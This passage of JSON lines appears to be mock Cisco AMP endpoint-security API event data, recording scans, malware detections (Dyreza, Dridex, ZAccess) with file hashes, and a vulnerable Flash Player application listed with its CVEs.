Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\DVD Maker","clean":true,"scanned_files":9,"scanned_processes":0,"scanned_paths":2,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364858376454000,"timestamp":1610705224,"timestamp_nanoseconds":772000000,"date":"2021-01-15T10:07:04+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\DVD Maker"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256331352113000,"timestamp":1610705217,"timestamp_nanoseconds":646000000,"date":"2021-01-15T10:06:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256331352113188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209511368491000,"timestamp":1610705210,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:06:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209511368491028","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364793951945000,"timestamp":1610705209,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:06:49+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Microsoft Games","clean":true,"scanned_files":30,"scanned_processes":0,"scanned_paths":14,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364789656977000,"timestamp":1610705208,"timestamp_nanoseconds":193000000,"date":"2021-01-15T10:06:48+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Microsoft Games"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256279812506000,"timestamp":1610705205,"timestamp_nanoseconds":634000000,"date":"2021-01-15T10:06:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256279812505635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209481303720000,"timestamp":1610705203,"timestamp_nanoseconds":152000000,"date":"2021-01-15T10:06:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209481303719955","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209477008753000,"timestamp":1610705202,"timestamp_nanoseconds":138000000,"date":"2021-01-15T10:06:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209477008752658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256228272898000,"timestamp":1610705193,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:06:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256228272898082","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209416879210000,"timestamp":1610705188,"timestamp_nanoseconds":769000000,"date":"2021-01-15T10:06:28+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209416879210513","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209412584243000,"timestamp":1610705187,"timestamp_nanoseconds":755000000,"date":"2021-01-15T10:06:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209412584243216","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256181028258000,"timestamp":1610705182,"timestamp_nanoseconds":0,"date":"2021-01-15T10:06:22+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256181028257825","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256125193683000,"timestamp":1610705169,"timestamp_nanoseconds":972000000,"date":"2021-01-15T10:06:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256125193682976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256073654075000,"timestamp":1610705157,"timestamp_nanoseconds":960000000,"date":"2021-01-15T10:05:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256073654075423","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533665784395203000,"timestamp":1610705155,"timestamp_nanoseconds":851000000,"date":"2021-01-15T10:05:55+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899829000000,"timestamp":1610705149,"timestamp_nanoseconds":829000000,"date":"2021-01-15T10:05:49+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610705149,"start_date":"2021-01-15T10:05:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"FlashPlayerApp.exe","identity":{"sha256":"c1219f0799e60ff48a9705b63c14168684aed911610fec68548ea08f605cc42b"}},"vulnerabilities":[{"name":"Adobe Flash Player","version":"11.5.502.146","cve":"CVE-2013-3333","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3333"},{"cve":"CVE-2014-0502","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0502"},{"cve":"CVE-2014-0498","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0498"},{"cve":"CVE-2014-0497","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0497"},{"cve":"CVE-2014-0492","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0492"},{"cve":"CVE-2014-0491","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0491"},{"cve":"CVE-2013-5332","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5332"},{"cve":"CVE-2013-5324","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5324"},{"cve":"CVE-2013-5329","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5329"},{"cve":"CVE-2013-5330","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5330"},{"cve":"CVE-2013-3361","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3361"},{"cve":"CVE-2013-3362","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3362"},{"cve":"CVE-2013-3363","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3363"},{"cve":"CVE-2013-3344","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3344"},{"cve":"CVE-2013-3345","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3345"},{"cve":"CVE-2013-3347","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3347"},{"cve":"CVE-2013-3343","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3343"},{"cve":"CVE-2013-2728","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2728"},{"cve":"CVE-2013-3324","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3324"},{"cve":"CVE-2013-3325","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3325"},{"cve":"CVE-2013-3326","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3326"},{"cve":"CVE-2013-3327","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3327"},{"cve":"CVE-2013-3328","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3328"},{"cve":"CVE-2013-3329","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3329"},{"cve":"CVE-2013-3330","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3330"},{"cve":"CVE-2013-3331","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3331"},{"cve":"CVE-2013-3332","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3332"},{"cve":"CVE-2013-3334","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3334"},{"cve":"CVE-2013-3335","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3335"},{"cve":"CVE-2013-1378","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1378"},{"cve":"CVE-2013-1379","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1379"},{"cve":"CVE-2013-1380","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1380"},{"cve":"CVE-2013-2555","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2555"},{"cve":"CVE-2013-0646","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0646"},{"cve":"CVE-2013-0650","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0650"},{"cve":"CVE-2013-1371","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1371"},{"cve":"CVE-2013-1375","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1375"},{"cve":"CVE-2013-0504","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0504"},{"cve":"CVE-2013-0638","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0638"},{"cve":"CVE-2013-0639","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0639"},{"cve":"CVE-2013-0642","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0642"},{"cve":"CVE-2013-0644","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0644"},{"cve":"CVE-2013-0645","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0645"},{"cve":"CVE-2013-0647","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0647"},{"cve":"CVE-2013-0649","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0649"},{"cve":"CVE-2013-1365","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1365"},{"cve":"CVE-2013-1366","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1366"},{"cve":"CVE-2013-1367","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1367"},{"cve":"CVE-2013-1368","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1368"},{"cve":"CVE-2013-1369","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1369"},{"cve":"CVE-2013-1370","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1370"},{"cve":"CVE-2013-1372","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1372"},{"cve":"CVE-2013-1373","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1373"},{"cve":"CVE-2013-1374","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1374"},{"cve":"CVE-2014-0507","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0507"},{"cve":"CVE-2013-5331","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5331"},{"cve":"CVE-2013-0648","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0648"},{"cve":"CVE-2013-0643","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0643"},{"cve":"CVE-2013-0634","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0634"},{"cve":"CVE-2013-0633","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0633"},{"cve":"CVE-2014-0499","score":7.8,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0499"},{"cve":"CVE-2014-0503","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0503"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364536253907000,"timestamp":1610705149,"timestamp_nanoseconds":228000000,"date":"2021-01-15T10:05:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Backdoor2:ZAccess-tpd","detection_id":"5832364536253906973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"80000000.@","file_path":"\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\$ff20833dbb78e410a1126d2ca0eecb73\\U\\80000000.@","identity":{"sha256":"9a9de323dc2ba4059c3eb10d20e8b93a4cc44c93ac41a5dfc9572fa1c0d5b1a8","sha1":"f18d87d7c547ed6118b74b2208e592f67b7fca43","md5":"800381acbba0e7bff6cfd0cfd704bf09"},"parent":{"process_id":496,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"d7bc4ed605b32274b45328fd9914fb0e7b90d869a38f0e6f94fb1bf4e9e2b407","sha1":"54a90c371155985420f455361a5b3ac897e6c96e","md5":"5f1b6a9c35d3d5ca72d6d6fdef9747d6"}}}}} 